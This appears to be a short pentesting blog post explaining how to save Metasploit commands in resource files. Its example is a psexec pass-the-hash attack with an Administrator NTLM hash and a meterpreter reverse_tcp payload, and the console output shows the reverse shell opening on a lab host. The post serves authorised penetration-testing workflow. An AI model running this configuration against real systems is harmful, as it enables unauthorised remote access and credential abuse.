InfoSecs.com

Metasploit has a handy feature that allows you to load settings from a file, this allows us to create easily repeatable configurations. I like to crate a directory structure when pen testing keeping notes and tool output in plain text files and find it useful to create and store the metasploit config files along with these.

The directory structure would look something like this:

Within the 230_psexec.rc file I would enter the commands I would issue in metasploit to recreate the exploit used against a specific vulnerability (in this case, reuse of passwords across various targets).

The contents of 230_psexec.rc looks like this:

use exploit windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit

 

We can either start metasploit and run these commands right away using the command:

msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

or use the command ‘resource’ within msfconsole like this:

msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

 

Our output would look like this:

root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11970 updated 5 days ago (2011.03.15)

resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

meterpreter >

You can also now add ruby scripts in to the .rc files, I am yet to play around with these but can imagine some very useful scripts, I will write more once I have tried them out.